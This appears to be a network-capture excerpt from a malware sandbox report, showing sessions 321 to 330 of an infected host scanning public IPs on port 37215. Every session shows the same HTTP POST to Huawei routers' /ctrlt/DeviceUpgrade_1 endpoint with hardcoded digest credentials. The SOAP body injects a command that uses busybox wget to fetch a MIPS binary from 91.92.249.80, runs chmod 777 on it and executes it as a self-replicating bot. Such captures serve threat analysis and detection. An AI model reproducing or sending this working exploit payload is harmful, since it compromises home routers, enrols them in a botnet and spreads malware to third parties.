                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          321192.168.2.235368641.142.11.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177196026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          322192.168.2.2355792197.150.78.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177212000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          323192.168.2.234349889.32.88.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177212954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          324192.168.2.2347344197.203.144.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177239895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          325192.168.2.2341914197.75.19.20437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177239895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          326192.168.2.233834838.220.172.24837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177257061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          327192.168.2.235116425.113.73.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177258015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          328192.168.2.2343148157.55.94.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177283049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          329192.168.2.2339434157.15.32.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177300930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          330192.168.2.2335400116.217.142.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.177305937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
